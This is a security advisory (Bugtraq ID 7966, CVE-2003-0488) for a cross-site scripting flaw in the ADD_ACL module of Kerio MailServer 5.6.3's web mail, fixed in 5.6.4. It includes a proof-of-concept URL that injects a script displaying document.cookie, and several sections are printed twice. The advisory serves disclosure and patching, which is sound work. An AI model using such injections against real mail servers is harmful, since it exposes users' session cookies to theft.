Kerio MailServer Web Mail ADD_ACL Module Cross-Site Scripting Vulnerability
BID:7966
Info
Kerio MailServer Web Mail ADD_ACL Module Cross-Site Scripting Vulnerability
| Bugtraq ID: | 7966 |
| Class: | Input Validation Error |
| CVE: |
CVE-2003-0488 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 18 2003 12:00AM |
| Updated: | Jul 11 2009 10:06PM |
| Credit: | Discovery of this vulnerability has been credited to "David F.Madrid" <[email protected]>. |
| Vulnerable: |
Kerio Mailserver 5.6.3 |
| Not Vulnerable: |
Kerio Mailserver 5.6.4 |
Exploit / POC
Kerio MailServer Web Mail ADD_ACL Module Cross-Site Scripting Vulnerability
The following proof of concept has been provided:
http://www.example.com/add_acl?folder=~conde0@localhost/INBOX&add_name=<script>alert(document.cookie);</script>
The following proof of concept has been provided:
http://www.example.com/add_acl?folder=~conde0@localhost/INBOX&add_name=<script>alert(document.cookie);</script>
Solution / Fix
Kerio MailServer Web Mail ADD_ACL Module Cross-Site Scripting Vulnerability
Solution:
This issue has been addressed in Kerio MailServer 5.6.4. Users should contact the vendor to obtain upgrades.
Solution:
This issue has been addressed in Kerio MailServer 5.6.4. Users should contact the vendor to obtain upgrades.
References
Kerio MailServer Web Mail ADD_ACL Module Cross-Site Scripting Vulnerability
References:
References:
- Kerio Homepage (Kerio)
- Multiple buffer overflows and XSS in Kerio MailServer ("David F.Madrid"
)